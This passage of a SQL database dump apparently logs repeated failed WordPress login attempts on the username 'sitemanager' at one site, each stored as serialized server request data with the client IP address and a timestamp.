Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44524\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.122.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746061778.900172;s:12:\"REQUEST_TIME\";i:1746061778;}}','68.65.122.90',0,'2025-05-01 06:39:40','1970-01-01 00:00:00'),(94751,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50880\";s:11:\"REMOTE_ADDR\";s:13:\"118.68.41.192\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746062104.3647289;s:12:\"REQUEST_TIME\";i:1746062104;}}','118.68.41.192',0,'2025-05-01 06:45:06','1970-01-01 00:00:00'),(94752,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56648\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746062413.1195221;s:12:\"REQUEST_TIME\";i:1746062413;}}','51.38.119.44',0,'2025-05-01 06:50:14','1970-01-01 00:00:00'),(94753,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34514\";s:11:\"REMOTE_ADDR\";s:14:\"81.177.139.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746062732.309643;s:12:\"REQUEST_TIME\";i:1746062732;}}','81.177.139.234',0,'2025-05-01 06:55:34','1970-01-01 00:00:00'),(94754,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59308\";s:11:\"REMOTE_ADDR\";s:13:\"182.43.230.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746063057.5398431;s:12:\"REQUEST_TIME\";i:1746063057;}}','182.43.230.63',0,'2025-05-01 07:00:59','1970-01-01 00:00:00'),(94755,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55100\";s:11:\"REMOTE_ADDR\";s:14:\"82.156.199.117\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746063374.6807561;s:12:\"REQUEST_TIME\";i:1746063374;}}','82.156.199.117',0,'2025-05-01 07:06:16','1970-01-01 00:00:00'),(94756,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36130\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.74.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746063690.54164;s:12:\"REQUEST_TIME\";i:1746063690;}}','167.86.74.244',0,'2025-05-01 07:11:32','1970-01-01 00:00:00'),(94757,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59812\";s:11:\"REMOTE_ADDR\";s:14:\"164.90.225.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746064012.0498409;s:12:\"REQUEST_TIME\";i:1746064012;}}','164.90.225.186',0,'2025-05-01 07:16:53','1970-01-01 00:00:00'),(94758,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48032\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746064335.2599649;s:12:\"REQUEST_TIME\";i:1746064335;}}','198.54.120.17',0,'2025-05-01 07:22:16','1970-01-01 00:00:00'),(94759,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44538\";s:11:\"REMOTE_ADDR\";s:14:\"162.240.232.97\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746065306.967248;s:12:\"REQUEST_TIME\";i:1746065306;}}','162.240.232.97',0,'2025-05-01 07:38:28','1970-01-01 00:00:00'),(94760,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54014\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746065965.329329;s:12:\"REQUEST_TIME\";i:1746065965;}}','23.239.27.53',0,'2025-05-01 07:49:27','1970-01-01 